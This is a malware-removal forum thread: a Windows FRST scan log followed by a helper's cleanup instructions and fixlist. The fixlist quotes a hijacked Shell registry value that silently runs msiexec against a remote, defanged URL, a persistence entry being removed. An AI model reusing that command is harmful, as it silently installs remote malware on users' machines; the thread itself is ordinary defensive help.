2017-08-09 22:03 - 2017-08-01 00:45 - 000475648 _____ (Microsoft Corporation) C:\WINDOWS\system32\msxbde40.dll
2017-08-09 22:03 - 2017-08-01 00:45 - 000375808 _____ (Microsoft Corporation) C:\WINDOWS\system32\mspbde40.dll
2017-08-09 22:03 - 2017-08-01 00:45 - 000343552 _____ (Microsoft Corporation) C:\WINDOWS\system32\msrd3x40.dll
2017-08-09 22:03 - 2017-08-01 00:45 - 000339968 _____ (Microsoft Corporation) C:\WINDOWS\system32\msexcl40.dll
2017-08-09 22:03 - 2017-08-01 00:45 - 000310272 _____ (Microsoft Corporation) C:\WINDOWS\system32\msrd2x40.dll
2017-08-09 22:03 - 2017-08-01 00:45 - 000290816 _____ (Microsoft Corporation) C:\WINDOWS\system32\msjtes40.dll
2017-08-09 22:03 - 2017-08-01 00:45 - 000272896 _____ (Microsoft Corporation) C:\WINDOWS\system32\mstext40.dll
2017-08-09 22:03 - 2017-08-01 00:45 - 000240640 _____ (Microsoft Corporation) C:\WINDOWS\system32\msltus40.dll
2017-08-09 22:03 - 2017-08-01 00:45 - 000144896 _____ (Microsoft Corporation) C:\WINDOWS\system32\msjint40.dll
2017-08-09 22:03 - 2017-08-01 00:45 - 000083968 _____ (Microsoft Corporation) C:\WINDOWS\system32\msjter40.dll
2017-08-09 22:02 - 2017-08-01 04:34 - 000060312 _____ (Microsoft Corporation) C:\WINDOWS\system32\Drivers\vmbkmcl.sys
2017-08-09 22:02 - 2017-08-01 04:20 - 001156608 _____ (Microsoft Corporation) C:\WINDOWS\system32\werconcpl.dll
2017-08-09 22:02 - 2017-08-01 04:20 - 000404480 _____ (Microsoft Corporation) C:\WINDOWS\system32\werui.dll
2017-08-09 22:02 - 2017-08-01 04:20 - 000154624 _____ (Microsoft Corporation) C:\WINDOWS\system32\DWWIN.EXE
2017-08-09 22:02 - 2017-08-01 04:20 - 000073216 _____ (Microsoft Corporation) C:\WINDOWS\system32\wsqmcons.exe
2017-08-09 22:02 - 2017-08-01 04:20 - 000067584 _____ (Microsoft Corporation) C:\WINDOWS\system32\wercplsupport.dll
2017-08-09 22:02 - 2017-08-01 04:17 - 000147456 _____ (Microsoft Corporation) C:\WINDOWS\system32\MdmDiagnostics.dll
2017-08-09 22:02 - 2017-08-01 04:16 - 000101376 _____ (Microsoft Corporation) C:\WINDOWS\system32\policymanagerprecheck.dll
2017-08-09 22:02 - 2017-08-01 04:15 - 000239616 _____ (Microsoft Corporation) C:\WINDOWS\system32\dmenterprisediagnostics.dll
2017-08-09 22:02 - 2017-08-01 04:13 - 000127488 _____ (Microsoft Corporation) C:\WINDOWS\system32\fdeploy.dll
2017-08-09 22:02 - 2017-08-01 04:12 - 000404992 _____ (Microsoft Corporation) C:\WINDOWS\system32\SmsRouterSvc.dll
2017-08-09 22:02 - 2017-08-01 04:09 - 000394240 _____ (Microsoft Corporation) C:\WINDOWS\system32\Windows.Internal.Management.dll
2017-08-09 22:02 - 2017-08-01 04:01 - 000242688 _____ (Microsoft Corporation) C:\WINDOWS\system32\DeviceEnroller.exe
2017-08-07 18:11 - 2017-08-07 18:11 - 000000979 _____ C:\Users\Public\Desktop\AVG Protection.lnk
2017-08-07 18:11 - 2017-08-07 18:11 - 000000000 ____D C:\ProgramData\Microsoft\Windows\Start Menu\Programs\AVG
2017-08-07 18:08 - 2017-08-07 18:08 - 000000000 ___HD C:\$AVG
2017-08-07 18:06 - 2017-08-21 21:26 - 000000000 ____D C:\ProgramData\MFAData
2017-08-05 17:21 - 2017-08-05 17:21 - 000001321 _____ C:\Users\dejan\Desktop\Continue Adobe Flash Player Installation.lnk
2017-08-05 00:15 - 2017-08-05 00:15 - 000005554 _____ C:\WINDOWS\system32\PerfStringBackup.TMP
2017-08-04 01:05 - 2017-07-28 06:48 - 001972128 _____ (Microsoft Corporation) C:\WINDOWS\system32\Drivers\ntfs.sys
2017-08-04 01:05 - 2017-07-28 06:48 - 001854832 _____ (Microsoft Corporation) C:\WINDOWS\system32\KernelBase.dll
2017-08-04 01:05 - 2017-07-28 06:48 - 000358816 _____ (Microsoft Corporation) C:\WINDOWS\system32\halmacpi.dll
2017-08-04 01:05 - 2017-07-28 06:48 - 000358816 _____ (Microsoft Corporation) C:\WINDOWS\system32\hal.dll
2017-08-04 01:05 - 2017-07-28 06:48 - 000100232 _____ (Microsoft Corporation) C:\WINDOWS\system32\bcd.dll
2017-08-04 01:05 - 2017-07-28 06:47 - 002259768 _____ (Microsoft Corporation) C:\WINDOWS\system32\CoreUIComponents.dll
2017-08-04 01:05 - 2017-07-28 06:47 - 000572320 _____ (Microsoft Corporation) C:\WINDOWS\system32\Drivers\acpi.sys
2017-08-04 01:05 - 2017-07-28 06:44 - 000239008 _____ (Microsoft Corporation) C:\WINDOWS\system32\Drivers\msiscsi.sys
2017-08-04 01:05 - 2017-07-28 06:40 - 005820984 _____ (Microsoft Corporation) C:\WINDOWS\system32\windows.storage.dll
2017-08-04 01:05 - 2017-07-28 06:40 - 000551200 _____ (Microsoft Corporation) C:\WINDOWS\system32\dxgi.dll
2017-08-04 01:05 - 2017-07-28 06:39 - 000434592 _____ (Microsoft Corporation) C:\WINDOWS\system32\Drivers\USBHUB3.SYS
2017-08-04 01:05 - 2017-07-28 06:38 - 004213656 _____ (Microsoft Corporation) C:\WINDOWS\system32\Windows.StateRepository.dll
2017-08-04 01:05 - 2017-07-28 06:38 - 000216504 _____ (Microsoft Corporation) C:\WINDOWS\system32\wininit.exe
2017-08-04 01:05 - 2017-07-28 06:37 - 000519680 _____ (Microsoft Corporation) C:\WINDOWS\system32\AppXDeploymentClient.dll
2017-08-04 01:05 - 2017-07-28 06:36 - 006761568 _____ (Microsoft Corporation) C:\WINDOWS\system32\Windows.Media.Protection.PlayReady.dll
2017-08-04 01:05 - 2017-07-28 06:36 - 005808640 _____ (Microsoft Corporation) C:\WINDOWS\system32\Windows.Media.dll
2017-08-04 01:05 - 2017-07-28 06:36 - 002424024 _____ (Microsoft Corporation) C:\WINDOWS\system32\mfmp4srcsnk.dll
2017-08-04 01:05 - 2017-07-28 06:36 - 000866808 _____ (Microsoft Corporation) C:\WINDOWS\system32\DolbyDecMFT.dll
2017-08-04 01:05 - 2017-07-28 06:35 - 000988168 _____ (Microsoft Corporation) C:\WINDOWS\system32\ole32.dll
2017-08-04 01:05 - 2017-07-28 06:33 - 002081184 _____ (Microsoft Corporation) C:\WINDOWS\system32\Drivers\tcpip.sys
2017-08-04 01:05 - 2017-07-28 06:33 - 000440184 _____ (Microsoft Corporation) C:\WINDOWS\system32\services.exe
2017-08-04 01:05 - 2017-07-28 06:33 - 000414296 _____ (Microsoft Corporation) C:\WINDOWS\system32\TextInputFramework.dll
2017-08-04 01:05 - 2017-07-28 06:24 - 000116736 _____ (Microsoft Corporation) C:\WINDOWS\system32\dwmredir.dll
2017-08-04 01:05 - 2017-07-28 06:21 - 000035328 _____ (Microsoft Corporation) C:\WINDOWS\system32\Drivers\UcmUcsi.sys
2017-08-04 01:05 - 2017-07-28 06:21 - 000029184 _____ (Microsoft Corporation) C:\WINDOWS\system32\cmintegrator.dll
2017-08-04 01:05 - 2017-07-28 06:20 - 000093184 _____ (Microsoft Corporation) C:\WINDOWS\system32\Drivers\bridge.sys
2017-08-04 01:05 - 2017-07-28 06:20 - 000079872 _____ (Microsoft Corporation) C:\WINDOWS\system32\wudriver.dll
2017-08-04 01:05 - 2017-07-28 06:19 - 000147456 _____ (Microsoft Corporation) C:\WINDOWS\system32\VCardParser.dll
2017-08-04 01:05 - 2017-07-28 06:19 - 000117760 _____ (Microsoft Corporation) C:\WINDOWS\system32\Windows.StateRepositoryUpgrade.dll
2017-08-04 01:05 - 2017-07-28 06:16 - 001291776 _____ (Microsoft Corporation) C:\WINDOWS\system32\MSVPXENC.dll
2017-08-04 01:05 - 2017-07-28 06:16 - 000585728 _____ (Microsoft Corporation) C:\WINDOWS\system32\FlightSettings.dll
2017-08-04 01:05 - 2017-07-28 06:16 - 000470016 _____ (Microsoft Corporation) C:\WINDOWS\system32\TpmCoreProvisioning.dll
2017-08-04 01:05 - 2017-07-28 06:16 - 000359424 _____ (Microsoft Corporation) C:\WINDOWS\system32\aadcloudap.dll
2017-08-04 01:05 - 2017-07-28 06:16 - 000171520 _____ (Microsoft Corporation) C:\WINDOWS\system32\psmsrv.dll
2017-08-04 01:05 - 2017-07-28 06:16 - 000167424 _____ (Microsoft Corporation) C:\WINDOWS\system32\storewuauth.dll
2017-08-04 01:05 - 2017-07-28 06:15 - 005721600 _____ (Microsoft Corporation) C:\WINDOWS\system32\BingMaps.dll
2017-08-04 01:05 - 2017-07-28 06:15 - 000581120 _____ (Microsoft Corporation) C:\WINDOWS\system32\wbiosrvc.dll
2017-08-04 01:05 - 2017-07-28 06:14 - 000678912 _____ (Microsoft Corporation) C:\WINDOWS\system32\bisrv.dll
2017-08-04 01:05 - 2017-07-28 06:14 - 000617984 _____ (Microsoft Corporation) C:\WINDOWS\system32\LogonController.dll
2017-08-04 01:05 - 2017-07-28 06:14 - 000368128 _____ (Microsoft Corporation) C:\WINDOWS\system32\InstallAgentUserBroker.exe
2017-08-04 01:05 - 2017-07-28 06:14 - 000357888 _____ (Microsoft Corporation) C:\WINDOWS\system32\ActivationManager.dll
2017-08-04 01:05 - 2017-07-28 06:14 - 000331264 _____ (Microsoft Corporation) C:\WINDOWS\system32\rastlsext.dll
2017-08-04 01:05 - 2017-07-28 06:13 - 000665600 _____ (Microsoft Corporation) C:\WINDOWS\system32\netlogon.dll
2017-08-04 01:05 - 2017-07-28 06:13 - 000457216 _____ (Microsoft Corporation) C:\WINDOWS\system32\AppReadiness.dll
2017-08-04 01:05 - 2017-07-28 06:12 - 000337920 _____ (Microsoft Corporation) C:\WINDOWS\system32\InstallAgent.exe
2017-08-04 01:05 - 2017-07-28 06:11 - 003667456 _____ (Microsoft Corporation) C:\WINDOWS\system32\D3DCompiler_47.dll
2017-08-04 01:05 - 2017-07-28 06:09 - 005225984 _____ (Microsoft Corporation) C:\WINDOWS\system32\d2d1.dll
2017-08-04 01:05 - 2017-07-28 06:08 - 004559360 _____ (Microsoft Corporation) C:\WINDOWS\system32\dbgeng.dll
2017-08-04 01:05 - 2017-07-28 06:08 - 004056064 _____ (Microsoft Corporation) C:\WINDOWS\system32\MFMediaEngine.dll
2017-08-04 01:05 - 2017-07-28 06:07 - 002211840 _____ (Microsoft Corporation) C:\WINDOWS\system32\InputService.dll
2017-08-04 01:05 - 2017-07-28 06:04 - 000073728 _____ (Microsoft Corporation) C:\WINDOWS\system32\Drivers\bthhfenum.sys
2017-08-04 01:05 - 2017-07-28 06:03 - 000089088 _____ (Microsoft Corporation) C:\WINDOWS\system32\MDMAppInstaller.exe
2017-08-04 01:05 - 2017-07-28 06:03 - 000085504 _____ (Microsoft Corporation) C:\WINDOWS\system32\RjvMDMConfig.dll
2017-08-04 01:05 - 2017-07-28 06:03 - 000062464 _____ (Microsoft Corporation) C:\WINDOWS\system32\EnterpriseDesktopAppMgmtCSP.dll
2017-08-04 01:05 - 2017-07-28 06:03 - 000046080 _____ (Microsoft Corporation) C:\WINDOWS\system32\DmApiSetExtImplDesktop.dll
2017-08-04 01:05 - 2017-07-28 06:02 - 001377280 _____ (Microsoft Corporation) C:\WINDOWS\system32\workfolderssvc.dll
2017-08-04 01:04 - 2017-07-28 07:07 - 000805816 _____ (Microsoft Corporation) C:\WINDOWS\system32\Windows.UI.dll
2017-08-04 01:04 - 2017-07-28 06:48 - 000096648 _____ (Microsoft Corporation) C:\WINDOWS\system32\dmcmnutils.dll
2017-08-04 01:04 - 2017-07-28 06:46 - 000698384 _____ (Microsoft Corporation) C:\WINDOWS\system32\CoreMessaging.dll
2017-08-04 01:04 - 2017-07-28 06:40 - 000755616 _____ (Microsoft Corporation) C:\WINDOWS\system32\efscore.dll
2017-08-04 01:04 - 2017-07-28 06:38 - 000777400 _____ (Microsoft Corporation) C:\WINDOWS\system32\ClipSVC.dll
2017-08-04 01:04 - 2017-07-28 06:38 - 000597920 _____ (Microsoft Corporation) C:\WINDOWS\system32\Drivers\fvevol.sys
2017-08-04 01:04 - 2017-07-28 06:36 - 020373408 _____ (Microsoft Corporation) C:\WINDOWS\system32\shell32.dll
2017-08-04 01:04 - 2017-07-28 06:36 - 001195760 _____ (Microsoft Corporation) C:\WINDOWS\system32\AudioEng.dll
2017-08-04 01:04 - 2017-07-28 06:36 - 000864248 _____ (Microsoft Corporation) C:\WINDOWS\system32\AudioSes.dll
2017-08-04 01:04 - 2017-07-28 06:36 - 000173104 _____ (Microsoft Corporation) C:\WINDOWS\system32\mfsensorgroup.dll
2017-08-04 01:04 - 2017-07-28 06:36 - 000090464 _____ (Microsoft Corporation) C:\WINDOWS\system32\msacm32.dll
2017-08-04 01:04 - 2017-07-28 06:35 - 000277432 _____ (Microsoft Corporation) C:\WINDOWS\system32\shlwapi.dll
2017-08-04 01:04 - 2017-07-28 06:33 - 000967584 _____ (Microsoft Corporation) C:\WINDOWS\system32\ReAgent.dll
2017-08-04 01:04 - 2017-07-28 06:25 - 003464704 _____ (Microsoft Corporation) C:\WINDOWS\system32\UIRibbon.dll
2017-08-04 01:04 - 2017-07-28 06:24 - 000584192 _____ (Microsoft Corporation) C:\WINDOWS\system32\UIRibbonRes.dll
2017-08-04 01:04 - 2017-07-28 06:21 - 000065024 _____ (Microsoft Corporation) C:\WINDOWS\system32\ofdeploy.exe
2017-08-04 01:04 - 2017-07-28 06:20 - 000206848 _____ (Microsoft Corporation) C:\WINDOWS\system32\DolbyMATEnc.dll
2017-08-04 01:04 - 2017-07-28 06:20 - 000095744 _____ (Microsoft Corporation) C:\WINDOWS\system32\wuuhosdeployment.dll
2017-08-04 01:04 - 2017-07-28 06:20 - 000081408 _____ (Microsoft Corporation) C:\WINDOWS\system32\officecsp.dll
2017-08-04 01:04 - 2017-07-28 06:20 - 000018432 _____ (Microsoft Corporation) C:\WINDOWS\system32\IpNatHlpClient.dll
2017-08-04 01:04 - 2017-07-28 06:19 - 000036352 _____ (Microsoft Corporation) C:\WINDOWS\system32\TpmTasks.dll
2017-08-04 01:04 - 2017-07-28 06:18 - 000703488 _____ (Microsoft Corporation) C:\WINDOWS\system32\DolbyHrtfEnc.dll
2017-08-04 01:04 - 2017-07-28 06:18 - 000139776 _____ (Microsoft Corporation) C:\WINDOWS\system32\BluetoothApis.dll
2017-08-04 01:04 - 2017-07-28 06:17 - 006728192 _____ (Microsoft Corporation) C:\WINDOWS\system32\twinui.dll
2017-08-04 01:04 - 2017-07-28 06:17 - 000661504 _____ C:\WINDOWS\system32\MBR2GPT.EXE
2017-08-04 01:04 - 2017-07-28 06:17 - 000393216 _____ (Microsoft Corporation) C:\WINDOWS\system32\bcdedit.exe
2017-08-04 01:04 - 2017-07-28 06:17 - 000338944 _____ (Microsoft Corporation) C:\WINDOWS\system32\Windows.Shell.BlueLightReduction.dll
2017-08-04 01:04 - 2017-07-28 06:17 - 000203776 _____ (Microsoft Corporation) C:\WINDOWS\system32\SettingsHandlers_Flights.dll
2017-08-04 01:04 - 2017-07-28 06:17 - 000168960 _____ (Microsoft Corporation) C:\WINDOWS\system32\bcdboot.exe
2017-08-04 01:04 - 2017-07-28 06:16 - 000332288 _____ (Microsoft Corporation) C:\WINDOWS\system32\SettingsHandlers_Display.dll
2017-08-04 01:04 - 2017-07-28 06:16 - 000272384 _____ (Microsoft Corporation) C:\WINDOWS\system32\SettingsHandlers_Notifications.dll
2017-08-04 01:04 - 2017-07-28 06:16 - 000135680 _____ (Microsoft Corporation) C:\WINDOWS\system32\qasf.dll
2017-08-04 01:04 - 2017-07-28 06:15 - 000586752 _____ (Microsoft Corporation) C:\WINDOWS\system32\Windows.Security.Authentication.Web.Core.dll
2017-08-04 01:04 - 2017-07-28 06:15 - 000578560 _____ (Microsoft Corporation) C:\WINDOWS\system32\XblAuthManager.dll
2017-08-04 01:04 - 2017-07-28 06:15 - 000414720 _____ (Microsoft Corporation) C:\WINDOWS\system32\TileDataRepository.dll
2017-08-04 01:04 - 2017-07-28 06:14 - 000844800 _____ (Microsoft Corporation) C:\WINDOWS\system32\lpasvc.dll
2017-08-04 01:04 - 2017-07-28 06:14 - 000435712 _____ (Microsoft Corporation) C:\WINDOWS\system32\Windows.Networking.UX.EapRequestHandler.dll
2017-08-04 01:04 - 2017-07-28 06:14 - 000177664 _____ (Microsoft Corporation) C:\WINDOWS\system32\SIHClient.exe
2017-08-04 01:04 - 2017-07-28 06:13 - 001208320 _____ (Microsoft Corporation) C:\WINDOWS\system32\AppXDeploymentExtensions.desktop.dll
2017-08-04 01:04 - 2017-07-28 06:13 - 000932352 _____ (Microsoft Corporation) C:\WINDOWS\system32\GamePanel.exe
2017-08-04 01:04 - 2017-07-28 06:13 - 000636416 _____ (Microsoft Corporation) C:\WINDOWS\system32\WpcWebFilter.dll
2017-08-04 01:04 - 2017-07-28 06:12 - 000952832 _____ (Microsoft Corporation) C:\WINDOWS\system32\comdlg32.dll
2017-08-04 01:04 - 2017-07-28 06:12 - 000587776 _____ (Microsoft Corporation) C:\WINDOWS\system32\PCPKsp.dll
2017-08-04 01:04 - 2017-07-28 06:12 - 000446464 _____ (Microsoft Corporation) C:\WINDOWS\system32\rastls.dll
2017-08-04 01:04 - 2017-07-28 06:12 - 000364032 _____ (Microsoft Corporation) C:\WINDOWS\system32\facecredentialprovider.dll
2017-08-04 01:04 - 2017-07-28 06:11 - 001513984 _____ (Microsoft Corporation) C:\WINDOWS\system32\AppXDeploymentExtensions.onecore.dll
2017-08-04 01:04 - 2017-07-28 06:11 - 001248768 _____ (Microsoft Corporation) C:\WINDOWS\system32\AzureSettingSyncProvider.dll
2017-08-04 01:04 - 2017-07-28 06:11 - 000962048 _____ (Microsoft Corporation) C:\WINDOWS\system32\dosvc.dll
2017-08-04 01:04 - 2017-07-28 06:10 - 001019904 _____ (Microsoft Corporation) C:\WINDOWS\system32\aadtb.dll
2017-08-04 01:04 - 2017-07-28 06:10 - 000787456 _____ (Microsoft Corporation) C:\WINDOWS\system32\wuapi.dll
2017-08-04 01:04 - 2017-07-28 06:10 - 000564224 _____ (Microsoft Corporation) C:\WINDOWS\system32\shsvcs.dll
2017-08-04 01:04 - 2017-07-28 06:09 - 002370048 _____ (Microsoft Corporation) C:\WINDOWS\system32\AppXDeploymentServer.dll
2017-08-04 01:04 - 2017-07-28 06:09 - 002040832 _____ (Microsoft Corporation) C:\WINDOWS\system32\Microsoft.Bluetooth.Profiles.Gatt.dll
2017-08-04 01:04 - 2017-07-28 06:08 - 004417024 _____ (Microsoft Corporation) C:\WINDOWS\system32\ExplorerFrame.dll
2017-08-04 01:04 - 2017-07-28 06:08 - 002122240 _____ (Microsoft Corporation) C:\WINDOWS\system32\wuaueng.dll
2017-08-04 01:04 - 2017-07-28 06:08 - 000772096 _____ (Microsoft Corporation) C:\WINDOWS\system32\MPSSVC.dll
2017-08-04 01:04 - 2017-07-28 06:08 - 000760832 _____ (Microsoft Corporation) C:\WINDOWS\system32\rasapi32.dll
2017-08-04 01:04 - 2017-07-28 06:08 - 000316416 _____ (Microsoft Corporation) C:\WINDOWS\system32\wuuhext.dll
2017-08-04 01:04 - 2017-07-28 06:06 - 001126912 _____ (Microsoft Corporation) C:\WINDOWS\system32\audiosrv.dll
2017-08-04 01:04 - 2017-07-28 06:06 - 000558080 _____ (Microsoft Corporation) C:\WINDOWS\system32\AudioEndpointBuilder.dll
2017-08-04 01:04 - 2017-07-28 06:05 - 001536512 _____ (Microsoft Corporation) C:\WINDOWS\system32\Windows.UI.Immersive.dll
2017-08-04 01:04 - 2017-07-28 06:05 - 000892928 _____ (Microsoft Corporation) C:\WINDOWS\system32\autochk.exe
2017-08-04 01:04 - 2017-07-28 06:05 - 000538112 _____ (Microsoft Corporation) C:\WINDOWS\system32\untfs.dll
2017-08-04 01:04 - 2017-07-28 06:04 - 000512000 _____ (Microsoft Corporation) C:\WINDOWS\system32\FrameServer.dll
2017-08-04 01:04 - 2017-07-28 06:02 - 001244160 _____ (Microsoft Corporation) C:\WINDOWS\system32\RecoveryDrive.exe
2017-08-04 01:04 - 2017-07-28 06:02 - 000949248 _____ (Microsoft Corporation) C:\WINDOWS\system32\reseteng.dll
2017-08-04 01:04 - 2017-07-28 06:02 - 000877056 _____ (Microsoft Corporation) C:\WINDOWS\system32\autoconv.exe
2017-08-04 01:04 - 2017-07-28 06:02 - 000853504 _____ (Microsoft Corporation) C:\WINDOWS\system32\autofmt.exe
2017-08-04 01:04 - 2017-07-28 06:02 - 000500224 _____ (Microsoft Corporation) C:\WINDOWS\system32\BootMenuUX.dll
2017-08-04 01:04 - 2017-07-28 06:02 - 000077312 _____ (Microsoft Corporation) C:\WINDOWS\system32\spbcd.dll
2017-08-04 01:04 - 2017-07-28 06:01 - 000065024 _____ (Microsoft Corporation) C:\WINDOWS\system32\setbcdlocale.dll
2017-08-03 00:30 - 2017-08-03 00:30 - 000000000 ____D C:\Users\dejan\Documents\GomPlayer

==================== One Month Modified files and folders ========

(If an entry is included in the fixlist, the file/folder will be moved.)

2017-08-21 21:42 - 2017-06-27 13:53 - 000301710 _____ C:\WINDOWS\ZAM.krnl.trace
2017-08-21 21:42 - 2017-06-27 13:53 - 000272673 _____ C:\WINDOWS\ZAM_Guard.krnl.trace
2017-08-21 21:27 - 2017-05-28 21:24 - 000000000 ____D C:\Program Files\Mozilla Firefox
2017-08-21 19:19 - 2017-06-13 16:57 - 000000000 ____D C:\Users\dejan
2017-08-21 19:19 - 2017-06-13 16:52 - 000000000 ____D C:\WINDOWS\system32\SleepStudy
2017-08-21 19:19 - 2016-11-18 20:21 - 000000000 ____D C:\Users\dejan\AppData\Roaming\DMCache
2017-08-21 18:25 - 2017-01-01 00:36 - 000000000 ____D C:\Users\dejan\AppData\Roaming\vlc
2017-08-21 16:24 - 2017-03-07 16:58 - 000000000 ____D C:\Users\dejan\AppData\Local\Adobe
2017-08-20 00:14 - 2017-04-17 20:40 - 000000000 ____D C:\Users\dejan\Downloads\Compressed
2017-08-20 00:14 - 2017-03-11 19:22 - 000000000 ____D C:\Users\dejan\AppData\Roaming\IDM
2017-08-19 23:57 - 2017-06-15 22:59 - 000000000 ____D C:\Users\dejan\Downloads\PopcornTime
2017-08-19 23:23 - 2017-03-18 08:02 - 000008192 _____ C:\WINDOWS\system32\config\ELAM
2017-08-19 19:39 - 2017-03-18 20:23 - 000000000 ___HD C:\Program Files\WindowsApps
2017-08-19 19:39 - 2017-03-18 20:23 - 000000000 ____D C:\WINDOWS\AppReadiness
2017-08-19 19:30 - 2017-06-13 17:29 - 000000006 ____H C:\WINDOWS\Tasks\SA.DAT
2017-08-19 19:13 - 2017-03-18 20:23 - 000000000 ____D C:\WINDOWS\LiveKernelReports
2017-08-19 19:10 - 2017-03-18 20:23 - 000000000 ____D C:\WINDOWS\system32\NDF
2017-08-14 23:50 - 2017-03-18 08:02 - 000524288 _____ C:\WINDOWS\system32\config\BBI
2017-08-14 23:43 - 2017-04-26 16:31 - 000000000 ____D C:\Users\dejan\AppData\Local\Facebook
2017-08-14 22:56 - 2016-09-07 15:27 - 000000000 ____D C:\Users\dejan\AppData\Local\Packages
2017-08-13 22:14 - 2016-09-24 16:45 - 000000000 ____D C:\Users\dejan\AppData\Roaming\Messenger for Desktop
2017-08-12 19:41 - 2017-06-13 17:56 - 000000000 ____D C:\WINDOWS\Minidump
2017-08-12 19:41 - 2017-03-18 20:21 - 000000000 ____D C:\WINDOWS\INF
2017-08-12 19:39 - 2016-09-08 21:40 - 000001038 _____ C:\Users\Public\Desktop\CCleaner.lnk
2017-08-12 19:33 - 2016-09-08 21:40 - 000000000 ____D C:\Program Files\CCleaner
2017-08-12 12:34 - 2017-03-18 20:14 - 000000000 ____D C:\WINDOWS\CbsTemp
2017-08-11 03:32 - 2017-03-18 20:23 - 000000000 ____D C:\WINDOWS\rescache
2017-08-11 00:17 - 2017-06-13 16:51 - 000223632 _____ C:\WINDOWS\system32\FNTCACHE.DAT
2017-08-09 22:09 - 2016-09-07 17:53 - 000000000 ____D C:\WINDOWS\system32\MRT
2017-08-09 22:04 - 2016-09-07 17:53 - 137505280 ____C (Microsoft Corporation) C:\WINDOWS\system32\MRT.exe
2017-08-08 23:48 - 2017-03-18 20:23 - 000000000 ____D C:\WINDOWS\system32\Macromed
2017-08-08 19:10 - 2016-12-06 00:06 - 000170200 _____ (Malwarebytes) C:\WINDOWS\system32\Drivers\MBAMSwissArmy.sys
2017-08-07 22:50 - 2016-12-09 23:37 - 000000000 ____D C:\Users\dejan\AppData\LocalLow\Mozilla
2017-08-07 19:15 - 2017-06-01 13:14 - 000000000 ____D C:\Users\dejan\AppData\Roaming\WinSAPSvc
2017-08-07 19:09 - 2017-05-27 15:46 - 000000000 ____D C:\Users\dejan\AppData\Local\terana
2017-08-07 18:55 - 2017-06-01 13:14 - 000000000 ____D C:\Users\dejan\AppData\Local\glory
2017-08-07 18:12 - 2016-09-14 15:56 - 000000000 ____D C:\Users\dejan\AppData\Local\Avg
2017-08-07 18:11 - 2017-03-18 20:23 - 000000000 ___HD C:\WINDOWS\ELAMBKUP
2017-08-07 18:06 - 2016-12-31 15:39 - 000000000 ____D C:\Program Files\AVG
2017-08-07 18:06 - 2016-09-14 15:56 - 000000000 ____D C:\ProgramData\Avg
2017-08-07 18:05 - 2016-09-14 15:56 - 000000000 ____D C:\Users\dejan\AppData\Local\AvgSetupLog
2017-08-07 18:01 - 2016-09-14 16:26 - 000000000 ____D C:\Users\dejan\AppData\Roaming\AVG
2017-08-05 00:14 - 2016-04-27 06:38 - 000000000 __RHD C:\Users\Public\AccountPictures
2017-08-04 19:18 - 2017-06-13 17:17 - 001135462 _____ C:\WINDOWS\system32\PerfStringBackup.INI
2017-08-04 19:11 - 2017-03-18 20:23 - 000000000 ___RD C:\WINDOWS\ImmersiveControlPanel
2017-08-04 19:11 - 2017-03-18 20:23 - 000000000 ____D C:\WINDOWS\system32\WinMetadata
2017-08-04 19:11 - 2017-03-18 20:23 - 000000000 ____D C:\WINDOWS\system32\WinBioPlugIns
2017-08-04 19:11 - 2017-03-18 20:23 - 000000000 ____D C:\WINDOWS\system32\oobe
2017-08-04 19:11 - 2017-03-18 20:23 - 000000000 ____D C:\WINDOWS\ShellExperiences
2017-08-04 19:11 - 2017-03-18 20:23 - 000000000 ____D C:\Program Files\Windows Photo Viewer
2017-07-31 17:15 - 2017-03-18 20:25 - 000835576 _____ (Adobe Systems Incorporated) C:\WINDOWS\system32\FlashPlayerApp.exe
2017-07-31 17:15 - 2017-03-18 20:25 - 000177648 _____ (Adobe Systems Incorporated) C:\WINDOWS\system32\FlashPlayerCPLApp.cpl
2017-07-29 00:05 - 2016-10-02 00:51 - 000000000 ____D C:\ProgramData\Microsoft\Windows\Start Menu\Programs\GOM
2017-07-29 00:05 - 2016-09-07 23:10 - 000001230 _____ C:\Users\dejan\AppData\Roaming\Microsoft\Windows\Start Menu\GOM Player.lnk
2017-07-29 00:05 - 2016-09-07 23:10 - 000001206 _____ C:\Users\Public\Desktop\GOM Player.lnk
2017-07-27 16:49 - 2017-06-13 23:31 - 000002367 _____ C:\Users\dejan\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\OneDrive.lnk
2017-07-27 16:49 - 2016-04-08 12:39 - 000000000 ___RD C:\Users\dejan\OneDrive

==================== Files in the root of some directories =======

2016-09-23 15:24 - 2016-10-19 12:50 - 000000396 _____ () C:\Users\dejan\AppData\Roaming\burnaware.ini
2016-12-09 01:04 - 2017-02-03 01:46 - 000001002 _____ () C:\Users\dejan\AppData\Roaming\downloads.json
2016-12-26 18:32 - 2016-12-26 18:32 - 000000353 _____ () C:\Users\dejan\AppData\Roaming\imagetuner.ini
2016-12-10 20:57 - 2016-12-11 23:26 - 000004608 _____ () C:\Users\dejan\AppData\Local\DCBC2A71-70D8-4DAN-EHR8-E0D61DEA3FDF.ini
2017-04-16 20:41 - 2017-04-16 20:41 - 000003370 _____ () C:\Users\dejan\AppData\Local\recently-used.xbel
2017-06-12 15:05 - 2017-06-12 15:05 - 000000017 _____ () C:\Users\dejan\AppData\Local\resmon.resmoncfg
2017-01-04 22:23 - 2017-01-07 22:01 - 000000176 _____ () C:\Users\dejan\AppData\Local\uts.ini

Files to move or delete:
====================
C:\Users\dejan\k350n_.reg


==================== Bamital & volsnap ======================

(There is no automatic fix for files that do not pass verification.)

C:\WINDOWS\explorer.exe => File is digitally signed
C:\WINDOWS\system32\winlogon.exe => File is digitally signed
C:\WINDOWS\system32\wininit.exe => File is digitally signed
C:\WINDOWS\system32\svchost.exe => File is digitally signed
C:\WINDOWS\system32\services.exe => File is digitally signed
C:\WINDOWS\system32\User32.dll => File is digitally signed
C:\WINDOWS\system32\userinit.exe => File is digitally signed
C:\WINDOWS\system32\rpcss.dll => File is digitally signed
C:\WINDOWS\system32\dnsapi.dll => File is digitally signed
C:\WINDOWS\system32\Drivers\volsnap.sys => File is digitally signed

LastRegBack: 2017-08-12 20:08

==================== End of FRST.txt ============================




offline
  • Joined: 14 Jun 2016
  • Posts: 535

Hello, uninstall the following programs:

Popcorn Time

Your profile is infected and you need to reinstall Chrome.

Open Notepad and copy in the following text, which is inside the Code box.

CreateRestorePoint:
HKLM\SOFTWARE\Policies\Microsoft\Windows Defender: Restriction <==== ATTENTION
HKU\S-1-5-21-2725342497-1767379937-2485888434-1001\...\Policies\system: [Shell] explorer.exe,msiexec.exe /i hxxp://point.ltdmsjq.com/?data=zDlkMj88OYU3RTwyRjE3OWUyMdYyFjY2NkE2NUZXRjq2NWH5Fq== /q <==== ATTENTION
